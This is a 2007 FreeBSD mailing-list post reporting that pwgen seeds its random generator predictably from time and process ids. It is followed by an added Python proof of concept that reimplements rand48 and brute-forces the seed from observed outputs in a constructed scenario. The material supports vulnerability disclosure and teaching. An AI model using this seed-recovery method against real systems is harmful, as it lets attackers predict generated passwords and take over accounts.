From: RW
To: questions@freebsd.org, oddbjorn@tricknology.org
Date: Mon, 8 Jan 2007 17:53:14 +0000
Subject: pwgen's seeding looks insecure
Message-ID: <20070108175314.27ce391f@gumby.homeunix.com>
List: freebsd-questions

Someone recently recommended sysutils/pwgen for generating user passwords.
Out of curiosity I had a look at how it works, and I don't like the look of its PRNG initialization:

    #ifdef RAND48
        srand48((time(0)<<9) ^ (getpgrp()<<15) ^ (getpid()) ^ (time(0)>>11));
    #else
        srand(time(0) ^ (getpgrp() << 8) + getpid());
    #endif

If pwgen is called from an account creation script, time(0) can be inferred from timestamps, e.g. on a home directory, so that just leaves getpid() and getpgrp(). PIDs are allocated sequentially and globally, so getpid() is highly predictable. I don't know much about getpgrp(), but from the manpage it doesn't appear to be any better.

Unless getpgrp() is a better source of entropy than I give it credit for, I think this port should perhaps be marked as vulnerable.
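The following is an added worked example, not code from the post or from pwgen itself. It models only the RAND48 seed path quoted above: it reimplements the standard 48-bit LCG behind srand48()/lrand48() (X' = 0x5DEECE66D * X + 0xB mod 2^48, seed placed in the top 32 bits over 0x330E, output = top 31 bits of the state), builds the seed exactly as the quoted expression does (truncated to a 32-bit long, as on i386), and then plays the attacker: given a timestamp known to within 30 seconds, a PID known to within about 150, and the assumption (this example's, not the post's) that the process group leader is the calling script with a PID at most 20 below pwgen's, it enumerates every candidate seed and picks out the true one from three outputs. The scenario values, including the epoch time and PIDs, are constructed. Whatever pwgen does with the lrand48() stream afterwards is not modelled; once the seed is known the rest is deterministic anyway. (As an aside on the non-RAND48 branch: `+` binds tighter than `^` in C, so that line seeds with `time(0) ^ ((getpgrp() << 8) + getpid())`, which is no wider.)

```python
"""Model of pwgen's srand48() seeding and a brute-force seed recovery.

Added example for the freebsd-questions thread above, not pwgen's own code.
Implements the POSIX rand48 generator and the quoted seed expression, then
shows that knowing the run time and PID roughly is enough to find the seed.
"""

# POSIX rand48 parameters: X_{n+1} = (A * X_n + C) mod 2^48
A = 0x5DEECE66D
C = 0xB
MASK48 = (1 << 48) - 1
MASK32 = (1 << 32) - 1


def srand48_state(seedval):
    """State after srand48(seedval): seed in the high 32 bits, 0x330E below."""
    return ((seedval & MASK32) << 16) | 0x330E


def lrand48_stream(state, n):
    """First n lrand48() values: the top 31 bits of each successive state."""
    out = []
    for _ in range(n):
        state = (A * state + C) & MASK48
        out.append(state >> 17)
    return out


def stream_matches(state, observed):
    """True if the generator started in `state` produces `observed` first."""
    for want in observed:
        state = (A * state + C) & MASK48
        if state >> 17 != want:
            return False
    return True


def pwgen_seed(t, pgrp, pid):
    """The seed expression quoted in the post, truncated to a 32-bit long."""
    return ((t << 9) ^ (pgrp << 15) ^ pid ^ (t >> 11)) & MASK32


def recover_seeds(observed, t_range, pid_range, pgrp_lag):
    """Enumerate every (time, pgrp, pid) triple the attacker thinks plausible.

    Assumptions of this example: the run time lies in t_range, pwgen's PID in
    pid_range, and the process group id is a PID between pid - pgrp_lag and
    pid (the calling script was started shortly before pwgen).
    Returns ({seed: [(t, pgrp, pid), ...]} for seeds reproducing `observed`,
    number of candidates tried).
    """
    matches = {}
    tried = 0
    for t in t_range:
        for pid in pid_range:
            for pgrp in range(pid - pgrp_lag, pid + 1):
                tried += 1
                seed = pwgen_seed(t, pgrp, pid)
                if stream_matches(srand48_state(seed), observed):
                    matches.setdefault(seed, []).append((t, pgrp, pid))
    return matches, tried


# Constructed scenario: an account-creation script ran pwgen at this epoch
# second (2007-01-08 17:53:14 UTC) with these process ids.
TRUE_T, TRUE_PGRP, TRUE_PID = 1168278794, 3104, 3109


def demo(outputs_seen=3):
    """Generate the victim's first outputs, then recover the seed from them."""
    observed = lrand48_stream(
        srand48_state(pwgen_seed(TRUE_T, TRUE_PGRP, TRUE_PID)), outputs_seen)
    # Attacker's knowledge: home-directory mtime to +-30 s, PID to ~150.
    found, tried = recover_seeds(observed,
                                 range(TRUE_T - 30, TRUE_T + 31),
                                 range(3000, 3151),
                                 pgrp_lag=20)
    return found, tried


if __name__ == "__main__":
    found, tried = demo()
    print("candidates tried:", tried)
    for seed, triples in found.items():
        print("seed 0x%08x reproduced by %s" % (seed, triples))
```

The search space here is 61 * 151 * 21 = 193,431 seeds, against a nominal 2^32 seed and 2^48 state; it completes in about a second in plain Python and leaves exactly one seed. Widening the windows to a day of uncertainty and the whole PID range still only multiplies the work by a few thousand.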